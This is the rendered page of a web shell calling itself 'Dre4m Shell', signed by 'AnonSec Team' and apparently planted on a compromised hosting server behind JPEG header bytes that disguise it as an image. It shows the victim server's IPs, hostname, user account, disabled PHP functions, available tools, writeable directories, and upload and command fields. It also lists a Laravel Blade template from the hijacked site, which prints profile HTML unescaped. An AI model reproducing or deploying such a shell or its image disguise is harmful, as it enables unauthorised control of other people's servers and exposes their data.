ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.222.167.75
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/nicnwebsiteUpgrade/resources/views/Administrative/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/nicnwebsiteUpgrade/resources/views/Administrative/pastChiefRegistrar.blade.php
@extends('layouts.layout')
@section('pageTitle')
  Past Chief Registrar
@endsection
@section('currentMember')
    current-menu-item
@stop
<!-- /Header -->
@section('content')

@include('_partialView.PageTop', array('fileName' => '' ))
 <div class="container">

        <section id="content">
            <!-- Section -->
            <section class="full-width-bg">
                
                <div class="row">
                
                    <div class="col-lg-9 col-md-9 col-sm-8">

                        <div class="animate-onscroll">
                            <div class="banner-wrapper">
                                <div class="banner">
                                   <div class="row">
                                        <div class="col-lg-12 col-md-12-col-sm-12">
                                            <div class="body-ban">
                                            
                                            @if(count($getChiefRegistrar) < 1) 
                                            <blockquote class="custom-quote">
                                            	<big class="text-danger">No Record Found Yet !</big> 
                                            </blockquote>
                                            @endif
                                            
                            @foreach($getChiefRegistrar as $listAll)                   
		                            <blockquote class="custom-quote" style="background: #fff;">
		                                <a href="#" data-toggle="modal" data-target="#profile{{$listAll->id}}" class="text-success"> 
		                                <div class="row">
		                                    <div class="col-md-2">
		                                        @if($listAll->picture == "")
		                                            <img class="thumb management-img" src="{{asset($getPathManagementStaff.'noPicture.png')}}" width="100" alt="">
		                                        @else
		                                            <img class="thumb management-img" src="{{asset($getPathManagementStaff.$listAll->picture)}}" width="100">
		                                        @endif
		                                    </div>
		                                    <div class="col-md-10">
		                                        <div align="left" class="text-green">
		                                            <p>{{$listAll->title . ' ' .$listAll->fullname}}, {{$listAll->position}}</p></b>
		                                            <b><small>{{$listAll->designation}}</small>
		                                        </div>
		                                    </div>
		                                </div>
		                                </a>
		                                
		                            </blockquote>
		                            <hr />

                            <!--Profile-->
                            <div class="modal fade" id="profile{{$listAll->id}}" role="dialog" aria-hidden="true" style="z-index: 100000">
                                <div class="modal-dialog">
                                    <div class="modal-content">
                                        <div class="modal-header" style="background: green; color: white;">
                                            <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                                            <big class="modal-title"> PROFILE DETAILS</big>
                                        </div>
                                        <div class="modal-body col-sm-12" style="padding: 10px;">
                                            <div style="padding: 10px;">
                                                <b><big>
                                                    {{$listAll->title ." ". $listAll->fullname}}
                                                </big></b>
                                            </div>
                                            <div>
                                                @if($listAll->picture == "")
                                                    <img src="{{asset($getPathManagementStaff.'noPicture.png')}}" style="float: left; margin-right: 10px; max-width: 200px;">
                                                @else
                                                    <img src="{{asset($getPathManagementStaff.$listAll->picture)}}" style="float: left; margin-right: 10px; max-width: 200px;">
                                                @endif
                                                <div align="justify">
                                                    @if($listAll->profile == "")
                                                        <big class="text-warning">No Information Found Yet !</big>
                                                    @else
                                                        {!! $listAll->profile !!}
                                                    @endif
                                                </div>
                                            </div>
                                            <hr > 
                                        </div>
                                        <div class="modal-footer"> 
                                            <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
                                        </div>
                                    </div>
                                </div>
                                <input type="hidden" name="managementID" value="{{$listAll->id}}">
                            </div>
                            <!-- //Profile Modal Dialog -->
	                      	
                          @endforeach


                                            </div>
                                        </div>
                                    </div>

                                    
                                </div>
                            </div>
                        </div>

                    </div>
                    
                   <div class="col-lg-3 col-md-3 col-sm-4">
                        @include('_partialView.sidebar')
                   </div>

                </div>
            </section>
            <!-- /SideBar Section -->

        </section>
    </div>
@stop

@section('styles')
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" rel="stylesheet"/>
@stop
@section('scripts')
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
@stop

Anon7 - 2022
AnonSec Team